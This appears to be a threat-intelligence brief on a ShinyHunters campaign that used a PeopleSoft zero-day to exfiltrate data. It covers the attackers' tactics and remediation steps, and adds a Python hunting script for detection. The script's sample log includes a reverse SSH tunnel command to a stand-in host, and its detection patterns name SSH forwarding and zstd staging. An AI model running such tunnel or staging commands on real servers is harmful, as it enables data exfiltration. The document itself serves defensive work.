PeopleSoft Zero-Day Enables ShinyHunters Exfiltration of 48GB from Single Victim
A confirmed PeopleSoft zero-day is driving active data exfiltration by ShinyHunters, with 48 GB published from one victim and hundreds of organizations affected. Legacy enterprise software creates persistent attack surface that produces measurable data-loss events rather than theoretical risk. Mandiant and Rapid7 IOCs enable direct containment actions.
Attackers left bash scripts that enumerated PeopleSoft configurations, WebLogic XML files, and process scheduler settings before establishing outbound SSH tunnels. Data was compressed with zstd and staged for upload to the ShinyHunters data-leak site. Several organizations blocked the activity; others saw full compromise and subsequent publication of records.
Mandiant and Rapid7 published IOCs showing the campaign overlaps with ShinyHunters tactics used since 2019 against Snowflake-hosted environments, Santander, and Ticketmaster supply chains. The 48 GB single-victim claim on the DLS matches observed zstd archives and partial file listings. Legacy PeopleSoft deployments remain exposed because enterprise change windows and dependency on Oracle WebLogic delay patching far longer than cloud-native assets.
Immediate steps include applying available PeopleSoft security updates, restricting outbound SSH from application servers, and auditing process-scheduler access logs. Organizations that defer remediation face continued risk of bulk data loss identical to prior ShinyHunters operations.
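One way to hunt for the sequence described above (zstd staging followed by an outbound SSH tunnel from an application server), as an added example that is not code from the article, Mandiant or Rapid7. The log format, host names, file paths, address and 30-minute window are constructed assumptions; adapt the parser to your own process-execution telemetry.

```python
import os
import re
import shlex
from datetime import datetime, timedelta

# Constructed sample process-execution events (not real telemetry).
# Assumed format: ISO timestamp, host, user, command line.
SAMPLE_EVENTS = """\
2026-01-10T02:11:04 psapp01 psoft bash /tmp/enum.sh
2026-01-10T02:14:31 psapp01 psoft zstd -19 -o /tmp/out.zst /tmp/stage.tar
2026-01-10T02:15:02 psapp01 psoft ssh -N -R 2222:localhost:22 user@203.0.113.10
2026-01-10T03:00:00 psapp02 psoft zstd -d backup.zst
2026-01-10T09:30:00 psapp03 admin ssh admin@10.0.0.5
"""

# ssh forwarding flags -R/-L/-D: alone, bundled (-NR) or with an attached value.
FORWARD = re.compile(r"-[A-Za-z0-9]*[RLD]|-[RLD]\S+")
NOT_COMPRESS = {"-d", "--decompress", "-t", "--test"}

def parse(line):
    ts, host, user, cmdline = line.split(maxsplit=3)
    return datetime.fromisoformat(ts), host, user, shlex.split(cmdline)

def is_zstd_compress(argv):
    # zstd compresses by default, so only explicit decompress/test runs are excluded.
    return os.path.basename(argv[0]) == "zstd" and not NOT_COMPRESS & set(argv[1:])

def is_ssh_forward(argv):
    return os.path.basename(argv[0]) == "ssh" and any(
        FORWARD.fullmatch(a) for a in argv[1:])

def staging_then_tunnel(log_text, window=timedelta(minutes=30)):
    """Return (host, user, zstd_time, ssh_time) for each ssh tunnel that
    starts on a host within `window` after a zstd compression there."""
    events = sorted(parse(l) for l in log_text.splitlines() if l.strip())
    last_zstd, alerts = {}, []
    for ts, host, user, argv in events:
        if is_zstd_compress(argv):
            last_zstd[host] = ts
        elif (is_ssh_forward(argv) and host in last_zstd
              and ts - last_zstd[host] <= window):
            alerts.append((host, user, last_zstd[host], ts))
    return alerts

if __name__ == "__main__":
    for host, user, z, s in staging_then_tunnel(SAMPLE_EVENTS):
        print(f"ALERT {host} user={user}: zstd at {z}, ssh forward at {s}")
```

Decompression runs and plain interactive SSH sessions are deliberately not flagged, which keeps routine backup restores and admin logins out of the alert queue.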
Mandiant: At least 50 additional victims with published data will appear on ShinyHunters DLS within 45 days
Sources (2)
- [1] Mandiant Intelligence Advisory - PeopleSoft Campaign (https://mandiant.com/resources/advisories/peoplesoft-shinyhunters)
- [2] Rapid7 PeopleSoft Vulnerability and IOC Report (https://www.rapid7.com/blog/post/2026/06/peoplesoft-zero-day)